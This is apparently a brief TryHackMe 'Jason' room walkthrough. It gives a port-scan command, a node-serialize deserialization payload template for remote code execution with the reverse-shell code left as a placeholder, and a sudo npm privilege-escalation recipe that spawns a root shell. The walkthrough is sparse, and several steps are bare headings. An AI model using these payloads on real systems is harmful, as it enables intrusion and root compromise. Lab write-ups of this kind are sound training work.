Skip to content

Complete TryHackMe Jason Room Writeup

TryHackMe Jason Writeup

TryHackMe Jason Room

TryHackMe Jason

We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake.

Thanks to @Luma for testing the room.

THM Jason

Scan the machine

rustscan -a 10.10.44.51

Investigate Web server

firefox http://10.10.44.51

Analise Source Code

Investigate Requests

10.10.82.11

Get a reverse Shell

nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}

Get User Flag

cat /home/dylan/user.txt

Escalate Privileges

Search for npm on GTFO Bins and we have

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

Get Root Flag

cat /root/root.txt

Room THM Jason

NodeJs Shell Generator